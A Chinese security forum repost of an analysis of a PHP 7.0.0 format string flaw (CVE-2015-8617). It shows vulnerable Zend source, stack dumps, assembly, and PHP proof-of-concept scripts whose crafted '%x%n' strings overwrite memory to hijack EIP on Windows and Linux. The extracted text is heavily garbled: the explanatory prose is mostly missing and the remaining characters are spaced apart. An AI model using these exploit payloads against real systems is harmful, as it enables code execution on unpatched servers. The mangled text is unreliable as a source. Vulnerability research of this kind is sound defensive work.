搜索

[10595] 2016-10-13_PHP7.0.0格式化字符串漏洞与EIP劫持分析

文档创建者:s7ckTeam
浏览次数:34
最后更新:2025-01-18
2016-10-13_PHP7.0.0格式化字符串漏洞与EIP劫持分析 P H P 7 . 0 . 0 E I P z z z 6 6 6 8 6   F r e e B u f   2 0 1 6 - 1 0 - 1 3 * z z z 6 6 6 8 6 F r e e B u f   P H P 7 . 0 . 0 1 5 1 2 e x p l o i t - d b C V E C V E - 2 0 1 5 - 8 6 1 7 E I P         1 . P H P s p p i n t f ( ) v s p p i n t f ( ) s p r i n t f ( ) v s p r i n t f ( ) P H P A P I   i n t   s p p r i n t f (   c h a r   * * p b u f ,   s i z e _ t   m a x _ l e n ,   c o n s t   c h a r   * f o r m a t ,   . . . ) ; P H P A P I   i n t   v s p p r i n t f ( c h a r   * * p b u f ,   s i z e _ t   m a x _ l e n ,   c o n s t   c h a r   * f o r m a t ,   v a _ l i s t   a p ) ; s p p r i n t f ( ) v s p p r i n t f ( ) 4 s p r i n t f ( ) v s p r i n t f ( ) P H P v s p p r i n t f ( ) 2 . v s p p r i n t f ( ) z e n d _ t h r o w _ e r r o r ( ) z e n d _ t h r o w _ e r r o r ( ) z e n d _ t h r o w _ o r _ e r r o r ( ) z e n d _ t h r o w _ o r _ e r r o r ( ) s t a t i c   v o i d   z e n d _ t h r o w _ o r _ e r r o r ( i n t   f e t c h _ t y p e ,   z e n d _ c l a s s _ e n t r y   * e x c e p t i o n _ c e ,   c o n s t   c h a r   * f o r m a t ,   . . . ) {                                   v a _ l i s t   v a ;                                   c h a r   * m e s s a g e   =   N U L L ;                                     v a _ s t a r t ( v a ,   f o r m a t ) ;                                   z e n d _ v s p p r i n t f ( & m e s s a g e ,   0 ,   f o r m a t ,   v a ) ;                                     i f   ( f e t c h _ t y p e   &   Z E N D _ F E T C H _ C L A S S _ E X C E P T I O N )   {                                   z e n d _ t h r o w _ e r r o r ( e x c e p t i o n _ c e ,     m e s s a g e ) ;   / / v u l _ f u n c                                         / / z e n d _ t h r o w _ e r r o r ( e x c e p t i o n _ c e ,     " % s " ,   m e s s a g e ) ;     p a t c h e d   i n     t h e   s u b s e q u e n t   v e r s i o n                                 }   e l s e   {                                   z e n d _ e r r o r ( E _ E R R O R ,   " % s " ,   m e s s a g e ) ;                                     }                                       e f r e e ( m e s s a g e ) ;                                   v a _ e n d ( v a ) ;                                 }
w i n d o w s l i n u x E I P 3 . w i n d o w s w i n 7 A S L R E I P P H P 7 . 0 . 0 w i n d o w s P H P p h p 7 t s . d l l p h p P H P p h p v s p p r i n t f ( ) z e n d _ t h r o w _ e r r o r ( ) v s p p r i n t f ( ) 0 4 4 1 E 8 9 0 v a _ l i s t s p p r i n t f ( ) % x % n E I P v s p p r i n t f ( ) 4 E I P v a _ l i s t v a _ l i s t v a _ l i s t v a _ l i s t v s p p r i n t f ( ) % x v a _ l i s t 0 4 4 1 E 8 9 0 v a _ l i s t 1 % x 0 5 6 5 D 3 C 0 % x 9 6 E 4 3 6 E 2 % x 0 4 4 1 E 8 C 4 v s p p r i n t f ( ) % n % x v a _ l i s t 2 % n 0 5 6 5 D 3 C 0 % n 9 6 E 4 3 6 E 2 P H P E I P < ? p h p                                 $ n a m e = " % n % n " ;                                 $ n a m e : : d o S o m e t h i n g ( ) ;                                 ? > # d e f i n e   v a _ l i s t   v o i d *  
1 0 4 4 1 E 8 C 4 4 0 4 4 1 E 8 9 8 2 0 4 4 1 E 8 C 4 使 使 0 4 4 1 E 8 2 C v s p p r i n t f ( ) 3 % x 0 4 4 1 E 8 C 4 0 4 4 1 E 8 2 C 使 使 0 4 4 2 2 2 2 2 0 4 4 1 E 8 2 4     9 6 E 4 0 1 1 2 0 4 4 1 E 8 2 8     9 6 E 4 3 6 5 9 0 4 4 1 E 8 2 C       0 4 4 2 2 2 2 2   < - - - - - 0 4 4 1 E 8 3 0     0 5 6 5 D 3 C 0 0 4 4 1 E 8 3 4     0 4 4 1 E 8 9 0 p h p 0 4 4 1 E 8 9 0       0 5 6 5 D 3 C 0 0 4 4 1 E 8 9 4       9 6 E 4 3 6 E 2 0 4 4 1 E 8 9 8       0 4 4 1 E 8 C 4 <   - - - - - - -   0 4 4 1 E 8 9 C       1 0 2 F 8 B E 2 0 4 4 1 E 8 A 0       0 0 0 0 0 2 0 0 0 4 4 1 E 8 9 0     0 5 6 5 D 3 C 0   <   - - - - - 0 4 4 1 E 8 9 4     9 6 E 4 3 6 E 2 0 4 4 1 E 8 9 8     0 4 4 1 E 8 C 4   < - - - - - 0 4 4 1 E 8 9 C       1 0 2 F 8 B E 2 0 4 4 1 E 8 A 0       0 0 0 0 0 2 0 0 0 4 4 1 E 8 B C         0 5 6 1 4 0 0 6 0 4 4 1 E 8 C 0       9 6 E 4 3 6 C 2 0 4 4 1 E 8 C 4         0 4 4 1 E 8 2 C   < - - - - - 0 4 4 1 E 8 C 8       1 0 3 8 6 5 E 9 0 4 4 1 E 8 C C         0 5 6 6 3 1 C 0
P H P 2 % x % n 0 4 4 1 E 8 C 4 0 4 4 1 E 8 2 C 1 0 % x % n 0 4 4 1 E 8 2 C 0 4 4 2 2 2 2 2 0 4 4 2 2 2 2 2 W i n d o w s 7 1 4 2 8 1 2 5 1 4 7 8 8 1 0 % x R O P E X P 4 . L i n u x L i n u x A S L R W i n d o w s L i n u x E I P E I P k i l l . e x e E X P p h p P H P P H P _ o b j e c t _ i n i t _ e x ( ) o b j e c t _ a n d _ p r o p e r t i e s _ i n i t ( ) < ? p h p                                 $ n a m e = " % 7 1 4 2 8 1 2 5 x % x % n % x % x % x % x % x % x % x % x % x % 1 4 7 8 8 x % n " ;                                 $ n a m e : : d o S o m e t h i n g ( ) ;                                 ? >   o b j e c t _ a n d _ p r o p e r t i e s _ i n i t ( )                                 {                                                                                   m o v   e b x ,   [ e s p + 0 C h + c l a s s _ t y p e ]                                                                                   m o v   e a x ,   [ e b x + 0 F C h ]                                                                                 c a l l   e a x                             ;   c a l l         [ [ e s p + 0 C h + c l a s s _ t y p e ] + 0 F C h ]                                                                           }  
[ e s p + 0 C h + c l a s s _ t y p e ] + 0 F C h c a l l   e a x E I P 3 p h p P H P % n 8 F F F B F C C 0 8 9 4 8 F 6 4 % n 0 8 9 4 8 F 4 0 8 9 5 5 5 5 5 c a l l   e a x P H P 8 9 5 5 5 5 5 L i n u x W i n d o w s C F G C F G / G U A R D : C F L i n u x 1 4 3 9 5 3 7 5 7 5 0 6 2 1 1 1 % x 0 8 9 4 8 F 5 C   0 8 9 4 5 D 4 C 0 8 9 4 8 F 6 0   0 8 9 4 5 D 5 0 0 8 9 4 8 F 6 4   0 8 9 5 5 5 5 5   <   - - - - - 0 8 9 4 8 F 6 8   0 0 0 0 0 0 0 0 0 8 9 4 8 F 6 C   0 0 0 0 0 0 0 0 B F F F B F 9 4   B 5 C 6 5 0 A 0 <   - - - - - B F F F B F 9 8   0 8 7 F 4 1 E 7 B F F F B F 9 C   B F F F B F C C   <   - - - - - B F F F B F A 0   0 8 9 5 F 8 9 0 B F F F B F A 4   0 0 0 0 0 0 0 0 B F F F B F C 4   0 0 0 0 0 0 0 0 B F F F B F C 8   0 8 7 F 4 1 E 7 B F F F B F C C   0 8 9 4 8 F 6 4 <   - - - - - B F F F B F D 0   B 5 C 1 4 0 2 0 B F F F B F D 4   B 5 C 7 4 0 5 4 < ? p h p                                 i n i _ s e t ( " m e m o r y _ l i m i t " ,   " 2 G " ) ;                                 $ n a m e = " % 1 4 3 9 5 3 7 5 7 x % n % x % x % x % x % x % x % x % x % x % x % 5 0 6 2 1 x % n " ;                                 $ n a m e : : d o S o m e t h i n g ( ) ;                                 ? >  
E X P 5 . P H P 7 . 0 . 0 w i n d o w s l i n u x E I P A S L R * z z z 6 6 6 8 6 F r e e B u f
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理